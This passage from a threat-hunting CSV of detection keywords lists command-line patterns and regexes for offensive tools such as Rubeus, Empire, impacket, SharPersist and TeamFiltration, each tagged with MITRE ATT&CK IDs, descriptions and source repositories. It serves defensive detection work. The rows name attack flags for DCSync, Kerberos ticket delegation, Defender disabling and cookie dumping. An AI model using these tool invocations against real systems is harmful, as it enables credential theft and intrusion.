*.exe*",".{0,1000}\s\-t\sCreateProcessAsUserW\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}\s\-e\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t dcsync://* -*",".{0,1000}\s\-t\sdcsync\:\/\/.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -t donut *",".{0,1000}\s\-t\sdonut\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -t pe2sh*",".{0,1000}\s\-t\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -t schtaskbackdoor *",".{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* T:U- odusN*",".{0,1000}\sT\:U\-\sodusN.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* t2w.py*",".{0,1000}\st2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "* -Target * -AllDomain *",".{0,1000}\s\-Target\s.{0,1000}\s\-AllDomain\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Target * -InitialGrooms *",".{0,1000}\s\-Target\s.{0,1000}\s\-InitialGrooms\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Target * -Shellcode *",".{0,1000}\s\-Target\s.{0,1000}\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --target=* --payload=*cmd.exe /c*",".{0,1000}\s\-\-target\=.{0,1000}\s\-\-payload\=.{0,1000}cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "* -target-domain * -outputfile * -no-pass*",".{0,1000}\s\-target\-domain\s.{0,1000}\s\-outputfile\s.{0,1000}\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* targetedKerberoast.py *",".{0,1000}\stargetedKerberoast\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -target-ip * -remote-dll *.dll* -local-dll *",".{0,1000}\s\-target\-ip\s.{0,1000}\s\-remote\-dll\s.{0,1000}\.dll.{0,1000}\s\-local\-dll\s.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "* --target-name * --domain * --dc-ip * --executable *.exe*",".{0,1000}\s\-\-target\-name\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* -Targets * -Method * -LocalAuth*",".{0,1000}\s\-Targets\s.{0,1000}\s\-Method\s.{0,1000}\s\-LocalAuth.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Targets All -Method WMI*",".{0,1000}\s\-Targets\sAll\s\-Method\sWMI.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Targets DCs*",".{0,1000}\s\-Targets\sDCs.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* targets-asn.nse*",".{0,1000}\stargets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-map4to6.nse*",".{0,1000}\stargets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-echo.nse*",".{0,1000}\stargets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\stargets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-mld.nse*",".{0,1000}\stargets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-multicast-slaac.nse*",".{0,1000}\stargets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-ipv6-wordlist.nse*",".{0,1000}\stargets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-sniffer.nse*",".{0,1000}\stargets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-traceroute.nse*",".{0,1000}\stargets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-xml.nse*",".{0,1000}\stargets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --target-user * --dc-ip * -command *",".{0,1000}\s\-\-target\-user\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-command\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* -TaskName RedPillTask*",".{0,1000}\s\-TaskName\sRedPillTask.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","windows Scheduled TaskName","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Tater.ps1*",".{0,1000}\sTater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* tdotnet publish Athena *",".{0,1000}\stdotnet\spublish\sAthena\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* TeamFiltration.dll*",".{0,1000}\sTeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* TeamFiltration.exe*",".{0,1000}\sTeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "* teams_dump.py*",".{0,1000}\steams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "* teamspeak2-version.nse*",".{0,1000}\steamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* teamstracker.py*",".{0,1000}\steamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "* telnet-brute.nse*",".{0,1000}\stelnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-encryption.nse*",".{0,1000}\stelnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-ntlm-info.nse*",".{0,1000}\stelnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* termux-chroot */cloudflared*",".{0,1000}\stermux\-chroot\s.{0,1000}\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "* Test different CLientID's against MSGraph to determine permissions*",".{0,1000}\sTest\sdifferent\sCLientID\'s\sagainst\sMSGraph\sto\sdetermine\spermissions.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* test_privesc.py*",".{0,1000}\stest_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* tftp-enum.nse*",".{0,1000}\stftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tgssub * /ticket:*",".{0,1000}\stgssub\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* tgtdeleg /nowrap*",".{0,1000}\stgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* tgtdeleg /spn:cifs*",".{0,1000}\stgtdeleg\s\/spn\:cifs.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* tgtdeleg /target:*",".{0,1000}\stgtdeleg\s\/target\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* thc-hidra*",".{0,1000}\sthc\-hidra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "* theHarvester.py *",".{0,1000}\stheHarvester\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* theHarvester.py*",".{0,1000}\stheHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Theif.dll*",".{0,1000}\sTheif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* 